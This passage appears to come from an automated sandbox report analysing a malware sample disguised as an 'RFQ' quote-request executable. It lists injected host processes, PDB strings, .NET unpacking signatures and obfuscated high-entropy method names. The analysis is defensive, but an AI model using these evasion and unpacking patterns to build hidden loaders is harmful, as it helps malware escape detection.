0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: runonce.pdb source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: VT3g2PdlLRVpwBp[1].exe.3.dr, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: xl9lsbb.exe.3.dr, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.cs.Net Code: VMHmfuKEXf System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.cs.Net Code: VMHmfuKEXf System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.6ef0000.4.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.6ef0000.4.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.2aac2e8.1.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.2aac2e8.1.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.cs.Net Code: VMHmfuKEXf System.Reflection.Assembly.Load(byte[])
              Source: 15.2.runonce.exe.4bfcd08.2.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.0.bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe.354cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.2.bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe.354cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 17.2.firefox.exe.2decd08.0.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: VT3g2PdlLRVpwBp[1].exe.3.drStatic PE information: 0xF5A03AEA [Mon Aug 2 19:39:22 2100 UTC]
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EEC304 LoadLibraryA,GetProcAddress,0_2_00EEC304
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED8719 push FFFFFF8Bh; iretd 0_2_00ED871B
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9E94F push edi; ret 0_2_00E9E951
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9EA68 push esi; ret 0_2_00E9EA6A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E98B85 push ecx; ret 0_2_00E98B98
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9EC43 push esi; ret 0_2_00E9EC45
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9ED2C push edi; ret 0_2_00E9ED2E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025013D0 pushad ; retn E4ABh1_2_025014A6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025163CC push ebx; iretd 1_2_0251643F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02503390 push eax; ret 1_2_02503392
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02501BAC pushad ; ret 1_2_02501C26
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250A85A push cs; iretd 1_2_0250A85B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02511888 push ecx; ret 1_2_02511891
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02503106 push es; iretd 1_2_02503107
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025231A3 push esi; retf 1_2_025231AE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250A6E8 pushfd ; iretd 1_2_0250A702
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02505775 push edx; iretd 1_2_02505744
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025187D5 pushfd ; ret 1_2_025187DA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02513C1B push es; retf 1_2_02513C22
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02501C2D pushad ; ret 1_2_02501C26
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02517C99 push esp; iretd 1_2_02517CA6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025145A1 push es; iretd 1_2_025145AA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0225F pushad ; ret 1_2_02F027F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F027FA pushad ; ret 1_2_02F027F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0283D push eax; iretd 1_2_02F02858
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx1_2_02F309B6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F01368 push eax; iretd 1_2_02F01369
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039D225F pushad ; ret 3_2_039D27F9
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039D27FA pushad ; ret 3_2_039D27F9
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A009AD push ecx; mov dword ptr [esp], ecx3_2_03A009B6
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039D283D push eax; iretd 3_2_039D2858
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039D1368 push eax; iretd 3_2_039D1369
              Source: VT3g2PdlLRVpwBp[1].exe.3.drStatic PE information: section name: .text entropy: 7.9778904613954715
              Source: xl9lsbb.exe.3.drStatic PE information: section name: .text entropy: 7.9778904613954715
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, JIXbT6WQgGNnNM192M.csHigh entropy of concatenated method names: 'GayUXXqcJi', 'PUtUlFP24n', 'C1vUbtSfBS', 'OkuUNHZCcy', 'BuvUVaWevv', 'SkVb03bbWX', 'flBb9T6CYn', 'zNibd7pOid', 'Vd1b7fPV1D', 'EFIbDfgiVG'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, FbDRsRoUK8rESGYi11.csHigh entropy of concatenated method names: 'n8qltgPJJK', 'uWdlgq4XxP', 'r6fljRlI1c', 'Kndlar4eND', 'Dt9l0MuuL9', 'eFDl9fBZnw', 'rqFldKdQuB', 'kxrl71Srq6', 'E6olDRjAkA', 'nQplwvMUtE'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.csHigh entropy of concatenated method names: 'fwKBXY20al', 'XP1BP4xbvW', 'GbSBlSUTCF', 'BAbBCVOmFd', 'IItBbxGowe', 'DvtBUvxxZp', 'IHbBNwu1p9', 'ogkBV73kCq', 'qJXBA1pLsC', 'oHsBTXwnDm'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, ck40obiVbH6brFYghT.csHigh entropy of concatenated method names: 'fQhNPu9lSR', 'sTKNCnA60u', 'a0fNUPahob', 'biXUwVpcnj', 'WktUzWCm18', 'JVINke4OXc', 'hm1NrLc0Q2', 'byxN62rDoZ', 'PHjNBtKuGD', 'KHsNmUcJEv'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, YBRuf3m6wC97koaAEA.csHigh entropy of concatenated method names: 'F6yrNbDRsR', 'jK8rVrESGY', 'FiirTSHLu6', 'tdLrOXhM0c', 'Jq3rMS4hIX', 'iT6r4QgGNn', 'WcxnZseU0FuY4JPl12', 'vTTeWwMAlnrDIsisfD', 'HlmrraPIZB', 'EnTrBHduir'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, TdDFQhDXWh6Q9Q2LqO.csHigh entropy of concatenated method names: 'QLwHWZbTtb', 'abuHEFEB2w', 'DblHLaZFb2', 'KhYHpaG3s5', 'YmNHtOf5bt', 'Ok1Hh6uFk0', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, EJ3B2yqiiSHLu61dLX.csHigh entropy of concatenated method names: 'yxyCSR0Qsb', 'MPgC2pYkRH', 'vSsCoUglRF', 'lHHCq00SSL', 'uiGCMBy43U', 'EriC4tWKnA', 'mpXCxF0uKD', 'mNlCH6K58k', 'KQgCvmDYnZ', 'Vq3C8jwnsp'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, qbCmH5zDKIPtx7xume.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'w1Zv5W3Qrt', 'psYvMKyDBP', 'puVv4JcpiI', 'xYAvxqg1g0', 'DODvHwYllT', 'QiHvv6KwXr', 'Jp0v8HGS6n'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, sDS4tmjyjBi15csXUB.csHigh entropy of concatenated method names: 'ToString', 'eax4si7DaO', 'NUO4E44t5O', 'Tny4LHVXXK', 'GCu4pxvlEE', 'dTU4hvcTcu', 'oUg4R1CxeH', 'BL54iRb8ZS', 'Xu44Y3bZpN', 'yql4eLWj11'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, sbMIneQI954nk1VNKy.csHigh entropy of concatenated method names: 'pL55o5ULq4', 'FyL5qqsoZZ', 'm5V5W9c8uC', 'FjQ5EtDbs3', 'kBZ5pumEBX', 'R7f5h6DhWS', 'mD55iCkCqF', 'y3v5YIM5CD', 'KVS5uccGlX', 'ppq5slQS24'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, vmE0k9rkQfM22hY723Q.csHigh entropy of concatenated method names: 'a1WvcTBnLA', 'hZuvFeOe6A', 'O7jvf2fqBy', 'fw6vSQQX0I', 'zeBvKUGZFT', 'q0cv20KGJo', 'vv2vJP594r', 'sKMvoAnUB1', 'iAXvqa9j5H', 'fdjvyOfi2L'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, ygnlx19tdmMWkOqBtm.csHigh entropy of concatenated method names: 'qw2x7e3Jv2', 'dojxwpsce8', 'ng5HkGKBWW', 'lpcHrYiEj4', 'G9DxsjSP0P', 'ReHxGMB5gq', 'nuXxQlLh1k', 'LigxtbZ07r', 'T2bxgrIVMq', 'bg4xji458v'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, YHv3HB71eXHZqYirID.csHigh entropy of concatenated method names: 'JLSHPNt0AG', 'ksCHlO9S5g', 'yAGHC8n9eT', 'r46HbxU2v9', 'VepHU3qXUE', 'LysHNG0HFY', 'DswHVTvEPY', 'B0cHAecVgG', 'xoXHTjSAI0', 'Io0HOvL0vT'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, Uh4F0ve7bQdwBRgsoB.csHigh entropy of concatenated method names: 'jJDNcK4XH8', 'lEuNFEMX4Q', 'Qw7NfStig0', 'cC3NSpeDQu', 'PYxNKb7fgR', 'KnXN2nOAG1', 'Dj7NJFqTmT', 'KU2NoqCDj9', 'IPtNqpoOhO', 'mgsNyY0XKp'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, t2wfK1wyNnpsQcBKtw.csHigh entropy of concatenated method names: 'e6jvrlGYxB', 'CQFvBHnQvo', 'P2jvmDiask', 'UlfvPIUZfX', 'CUPvlFLeo0', 'k0QvbKS1gE', 'eJPvUrPkoQ', 'NnwHdmsMAV', 'kwmH7yioSo', 'aFXHD5heZr'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, DqCNrv6DAiDtWMEe1X.csHigh entropy of concatenated method names: 'vhMfnsAw8', 'EbQSDmakD', 'H632Jkh0f', 'RSIJ61DnN', 'Xpjq5ZKFy', 'lUmym00Ti', 'rWa3N7gX5eUqmJAE7v', 'yWqUuddxMFfjCAVjHg', 'SYSHvTO7x', 'DPA8j8wUW'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, QdSQaLrBM9tVlJO1y9W.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HZo8tIZSm6', 'el78gCbYc3', 'bjR8jXLwTW', 'X0Z8a6eLFe', 'Bn780lJLbr', 'DUe89kN1Yl', 'Msk8duIYu0'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, piyy79lLiM1rUZW8Yn.csHigh entropy of concatenated method names: 'Dispose', 'NyWrDxMrcT', 'Mc56EHugMT', 'Umd11PXVL4', 'FDHrwv3HB1', 'NXHrzZqYir', 'ProcessDialogKey', 'wDa6kdDFQh', 'eWh6r6Q9Q2', 'IqO6612wfK'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, BUK7GIrrZ35JJ62Dy5Z.csHigh entropy of concatenated method names: 'ToString', 'YTF8BPZSnM', 'I3J8mCuXk2', 'Bvh8XAv28G', 'dvs8PWIOyN', 'GDk8lYYcNN', 'ba58Cayc5b', 'FwP8b90qVy', 'XZsJYHGCC3Ji2JMmL8b', 'aNoKadG3oEsN6R9NQYL'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, OoaFmctcsvJ1Rdaqec.csHigh entropy of concatenated method names: 'vLsMu2dZ0Z', 'C3rMGp9Mf5', 'UJTMtLUaYO', 'Kh2MgVOvbX', 'cZRMENo0hp', 'dR8MLBQIls', 'LjqMpetHAu', 'lSpMhZqjQQ', 'U7yMRVpf2x', 'P6IMiPPwWN'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, JIXbT6WQgGNnNM192M.csHigh entropy of concatenated method names: 'GayUXXqcJi', 'PUtUlFP24n', 'C1vUbtSfBS', 'OkuUNHZCcy', 'BuvUVaWevv', 'SkVb03bbWX', 'flBb9T6CYn', 'zNibd7pOid', 'Vd1b7fPV1D', 'EFIbDfgiVG'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, FbDRsRoUK8rESGYi11.csHigh entropy of concatenated method names: 'n8qltgPJJK', 'uWdlgq4XxP', 'r6fljRlI1c', 'Kndlar4eND', 'Dt9l0MuuL9', 'eFDl9fBZnw', 'rqFldKdQuB', 'kxrl71Srq6', 'E6olDRjAkA', 'nQplwvMUtE'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.csHigh entropy of concatenated method names: 'fwKBXY20al', 'XP1BP4xbvW', 'GbSBlSUTCF', 'BAbBCVOmFd', 'IItBbxGowe', 'DvtBUvxxZp', 'IHbBNwu1p9', 'ogkBV73kCq', 'qJXBA1pLsC', 'oHsBTXwnDm'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, ck40obiVbH6brFYghT.csHigh entropy of concatenated method names: 'fQhNPu9lSR', 'sTKNCnA60u', 'a0fNUPahob', 'biXUwVpcnj', 'WktUzWCm18', 'JVINke4OXc', 'hm1NrLc0Q2', 'byxN62rDoZ', 'PHjNBtKuGD', 'KHsNmUcJEv'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, YBRuf3m6wC97koaAEA.csHigh entropy of concatenated method names: 'F6yrNbDRsR', 'jK8rVrESGY', 'FiirTSHLu6', 'tdLrOXhM0c', 'Jq3rMS4hIX', 'iT6r4QgGNn', 'WcxnZseU0FuY4JPl12', 'vTTeWwMAlnrDIsisfD', 'HlmrraPIZB', 'EnTrBHduir'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, TdDFQhDXWh6Q9Q2LqO.csHigh entropy of concatenated method names: 'QLwHWZbTtb', 'abuHEFEB2w', 'DblHLaZFb2', 'KhYHpaG3s5', 'YmNHtOf5bt', 'Ok1Hh6uFk0', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, EJ3B2yqiiSHLu61dLX.csHigh entropy of concatenated method names: 'yxyCSR0Qsb', 'MPgC2pYkRH', 'vSsCoUglRF', 'lHHCq00SSL', 'uiGCMBy43U', 'EriC4tWKnA', 'mpXCxF0uKD', 'mNlCH6K58k', 'KQgCvmDYnZ', 'Vq3C8jwnsp'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, qbCmH5zDKIPtx7xume.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'w1Zv5W3Qrt', 'psYvMKyDBP', 'puVv4JcpiI', 'xYAvxqg1g0', 'DODvHwYllT', 'QiHvv6KwXr', 'Jp0v8HGS6n'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, sDS4tmjyjBi15csXUB.csHigh entropy of concatenated method names: 'ToString', 'eax4si7DaO', 'NUO4E44t5O', 'Tny4LHVXXK', 'GCu4pxvlEE', 'dTU4hvcTcu', 'oUg4R1CxeH', 'BL54iRb8ZS', 'Xu44Y3bZpN', 'yql4eLWj11'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, sbMIneQI954nk1VNKy.csHigh entropy of concatenated method names: 'pL55o5ULq4', 'FyL5qqsoZZ', 'm5V5W9c8uC', 'FjQ5EtDbs3', 'kBZ5pumEBX', 'R7f5h6DhWS', 'mD55iCkCqF', 'y3v5YIM5CD', 'KVS5uccGlX', 'ppq5slQS24'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, vmE0k9rkQfM22hY723Q.csHigh entropy of concatenated method names: 'a1WvcTBnLA', 'hZuvFeOe6A', 'O7jvf2fqBy', 'fw6vSQQX0I', 'zeBvKUGZFT', 'q0cv20KGJo', 'vv2vJP594r', 'sKMvoAnUB1', 'iAXvqa9j5H', 'fdjvyOfi2L'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, ygnlx19tdmMWkOqBtm.csHigh entropy of concatenated method names: 'qw2x7e3Jv2', 'dojxwpsce8', 'ng5HkGKBWW', 'lpcHrYiEj4', 'G9DxsjSP0P', 'ReHxGMB5gq', 'nuXxQlLh1k', 'LigxtbZ07r', 'T2bxgrIVMq', 'bg4xji458v'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, YHv3HB71eXHZqYirID.csHigh entropy of concatenated method names: 'JLSHPNt0AG', 'ksCHlO9S5g', 'yAGHC8n9eT', 'r46HbxU2v9', 'VepHU3qXUE', 'LysHNG0HFY', 'DswHVTvEPY', 'B0cHAecVgG', 'xoXHTjSAI0', 'Io0HOvL0vT'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, Uh4F0ve7bQdwBRgsoB.csHigh entropy of concatenated method names: 'jJDNcK4XH8', 'lEuNFEMX4Q', 'Qw7NfStig0', 'cC3NSpeDQu', 'PYxNKb7fgR', 'KnXN2nOAG1', 'Dj7NJFqTmT', 'KU2NoqCDj9', 'IPtNqpoOhO', 'mgsNyY0XKp'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, t2wfK1wyNnpsQcBKtw.csHigh entropy of concatenated method names: 'e6jvrlGYxB', 'CQFvBHnQvo', 'P2jvmDiask', 'UlfvPIUZfX', 'CUPvlFLeo0', 'k0QvbKS1gE', 'eJPvUrPkoQ', 'NnwHdmsMAV', 'kwmH7yioSo', 'aFXHD5heZr'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, DqCNrv6DAiDtWMEe1X.csHigh entropy of concatenated method names: 'vhMfnsAw8', 'EbQSDmakD', 'H632Jkh0f', 'RSIJ61DnN', 'Xpjq5ZKFy', 'lUmym00Ti', 'rWa3N7gX5eUqmJAE7v', 'yWqUuddxMFfjCAVjHg', 'SYSHvTO7x', 'DPA8j8wUW'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, QdSQaLrBM9tVlJO1y9W.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HZo8tIZSm6', 'el78gCbYc3', 'bjR8jXLwTW', 'X0Z8a6eLFe', 'Bn780lJLbr', 'DUe89kN1Yl', 'Msk8duIYu0'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, piyy79lLiM1rUZW8Yn.csHigh entropy of concatenated method names: 'Dispose', 'NyWrDxMrcT', 'Mc56EHugMT', 'Umd11PXVL4', 'FDHrwv3HB1', 'NXHrzZqYir', 'ProcessDialogKey', 'wDa6kdDFQh', 'eWh6r6Q9Q2', 'IqO6612wfK'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, BUK7GIrrZ35JJ62Dy5Z.csHigh entropy of concatenated method names: 'ToString', 'YTF8BPZSnM', 'I3J8mCuXk2', 'Bvh8XAv28G', 'dvs8PWIOyN', 'GDk8lYYcNN', 'ba58Cayc5b', 'FwP8b90qVy', 'XZsJYHGCC3Ji2JMmL8b', 'aNoKadG3oEsN6R9NQYL'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, OoaFmctcsvJ1Rdaqec.csHigh entropy of concatenated method names: 'vLsMu2dZ0Z', 'C3rMGp9Mf5', 'UJTMtLUaYO', 'Kh2MgVOvbX', 'cZRMENo0hp', 'dR8MLBQIls', 'LjqMpetHAu', 'lSpMhZqjQQ', 'U7yMRVpf2x', 'P6IMiPPwWN'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, JIXbT6WQgGNnNM192M.csHigh entropy of concatenated method names: 'GayUXXqcJi', 'PUtUlFP24n', 'C1vUbtSfBS', 'OkuUNHZCcy', 'BuvUVaWevv', 'SkVb03bbWX', 'flBb9T6CYn', 'zNibd7pOid', 'Vd1b7fPV1D', 'EFIbDfgiVG'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, FbDRsRoUK8rESGYi11.csHigh entropy of concatenated method names: 'n8qltgPJJK', 'uWdlgq4XxP', 'r6fljRlI1c', 'Kndlar4eND', 'Dt9l0MuuL9', 'eFDl9fBZnw', 'rqFldKdQuB', 'kxrl71Srq6', 'E6olDRjAkA', 'nQplwvMUtE'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.csHigh entropy of concatenated method names: 'fwKBXY20al', 'XP1BP4xbvW', 'GbSBlSUTCF', 'BAbBCVOmFd', 'IItBbxGowe', 'DvtBUvxxZp', 'IHbBNwu1p9', 'ogkBV73kCq', 'qJXBA1pLsC', 'oHsBTXwnDm'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, ck40obiVbH6brFYghT.csHigh entropy of concatenated method names: 'fQhNPu9lSR', 'sTKNCnA60u', 'a0fNUPahob', 'biXUwVpcnj', 'WktUzWCm18', 'JVINke4OXc', 'hm1NrLc0Q2', 'byxN62rDoZ', 'PHjNBtKuGD', 'KHsNmUcJEv'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, YBRuf3m6wC97koaAEA.csHigh entropy of concatenated method names: 'F6yrNbDRsR', 'jK8rVrESGY', 'FiirTSHLu6', 'tdLrOXhM0c', 'Jq3rMS4hIX', 'iT6r4QgGNn', 'WcxnZseU0FuY4JPl12', 'vTTeWwMAlnrDIsisfD', 'HlmrraPIZB', 'EnTrBHduir'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, TdDFQhDXWh6Q9Q2LqO.csHigh entropy of concatenated method names: 'QLwHWZbTtb', 'abuHEFEB2w', 'DblHLaZFb2', 'KhYHpaG3s5', 'YmNHtOf5bt', 'Ok1Hh6uFk0', 'Next', 'Next', 'Next', 'NextBytes'
